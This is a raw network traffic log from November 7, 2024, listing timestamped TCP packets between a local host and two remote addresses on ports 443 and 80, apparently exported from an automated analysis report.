                                                                            Nov 7, 2024 16:51:06.534240007 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.534286976 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.534295082 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.534396887 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.535345078 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.535388947 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.535394907 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.535979033 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.536024094 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.536031008 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.537134886 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.537180901 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.537189007 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.537400007 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.569456100 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.569544077 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.569555044 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.616377115 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.616471052 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.616491079 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.648454905 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.648538113 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.648546934 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.648698092 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.648732901 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.648751974 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.648763895 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.648777008 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.648802042 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.648873091 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.648880959 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.648921013 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.648929119 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.648955107 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.648997068 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.649003029 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.649148941 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.649198055 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.649204969 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.649502993 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.649555922 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.649563074 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.650954962 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.651010036 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.651022911 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.651181936 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.651231050 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.651237965 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.651300907 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.651348114 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.651355028 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.652549028 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.652607918 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.652616024 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.656328917 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.656363010 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.728641987 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.728729963 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.728743076 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.732105017 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.732165098 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.732172966 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.763962030 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.764055967 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.764065027 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.764166117 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.764219046 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.764225960 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.764435053 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.764480114 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.764487982 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.764657021 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.764708042 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.764717102 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.764942884 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.764993906 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.765001059 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.765201092 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.765317917 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.765328884 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.766284943 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.766338110 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.766345978 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.766536951 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.766587019 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.766593933 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.766755104 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.766808987 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.766817093 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.767857075 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.768093109 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.768147945 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.768153906 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.768574953 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.800649881 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.800740004 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.800750017 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.847520113 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.847593069 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.847610950 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.879594088 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.879734993 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.879745007 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.879870892 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.879900932 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.879915953 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.879925013 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.879961014 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.880027056 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.880076885 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.880083084 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.880254030 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.880316019 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.880330086 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.880563974 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.880614042 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.880621910 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.880811930 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.880861044 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.880867004 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.881036043 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.881079912 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.881088972 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.881767988 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.881824970 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.881834030 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.882009029 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.882060051 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.882067919 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.882369041 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.882416010 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.882421970 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.883790016 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.883841991 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.883850098 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.916224957 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.916392088 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.916404009 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.963161945 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.963227987 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.963243961 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.994975090 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995009899 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995152950 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.995163918 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995230913 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995239973 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995285034 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.995297909 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995457888 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995465994 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995515108 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.995522976 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995701075 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995728970 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995754004 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.995763063 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995807886 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.995924950 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995938063 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.995979071 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.996187925 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.996239901 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.996248007 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.997356892 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.997416019 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.997422934 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.997509003 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.997555017 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.997561932 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.999880075 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:06.999944925 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:06.999953032 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.001296043 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.001374006 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.001380920 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.001729012 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.001785040 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.001791000 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.061053991 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.061160088 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.061173916 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.078274965 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.078321934 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.078444004 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.078457117 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.110517979 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.110554934 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.110599995 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.110614061 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.110655069 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.110692978 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.110704899 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.110730886 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.110749960 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.110759020 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.111115932 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.111162901 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.111169100 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.111433029 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.111488104 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.111495972 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.111670971 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.111716032 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.111721992 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.111922979 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.111979008 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.111985922 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.112200975 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.112243891 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.112251997 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.112548113 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.112613916 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.112620115 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.114130020 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.114176989 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.114186049 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.114475012 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.114520073 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.114527941 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.114738941 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.114789009 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.114795923 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.115988016 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.116034031 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.116041899 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.176898003 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.176989079 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.177007914 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.194191933 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.194226027 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.194348097 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.194359064 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.227231979 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.227272987 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.227308989 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.227338076 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.227349997 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.227358103 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.227390051 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.227400064 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.227437973 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.227495909 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.227504015 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.227540970 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.227547884 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.227780104 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.227830887 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.227838039 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.228018999 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.228065968 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.228072882 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.228332043 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.228383064 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.228389978 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.228410959 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.228451014 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.228475094 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.228677034 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.228718996 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.228724957 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.228761911 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:07.228801012 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:07.232275009 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:20.166358948 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:20.171159983 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:20.171224117 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:20.171288967 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:20.176167011 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.058140993 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.058161020 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.058171988 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.058187008 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.058197975 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.058206081 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.058218956 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.058255911 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.058268070 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.058269024 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.058278084 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.058324099 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.058324099 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.063158989 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.063242912 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.163685083 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.163707972 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.163719893 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.163789034 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.175626993 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.175652027 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.175664902 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.175703049 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.175740004 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.175754070 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.175800085 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.175844908 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.176007986 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.176058054 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.176079988 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.176093102 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.176095009 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.176105976 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.176151037 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.280723095 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.280742884 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.280754089 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.280896902 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.292438984 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.292469978 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.292480946 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.292529106 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.292546988 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.292561054 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.292573929 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.292601109 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.292694092 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.293237925 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.293287039 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.293303967 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.293309927 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.293311119 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.293351889 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.297588110 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.297600031 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.297681093 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.397804022 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.397815943 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.397840023 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.397962093 CET4916780192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:51:21.397989988 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.409611940 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.409637928 CET8049167141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:51:21.409650087 CET8049167141.98.10.88192.168.2.22
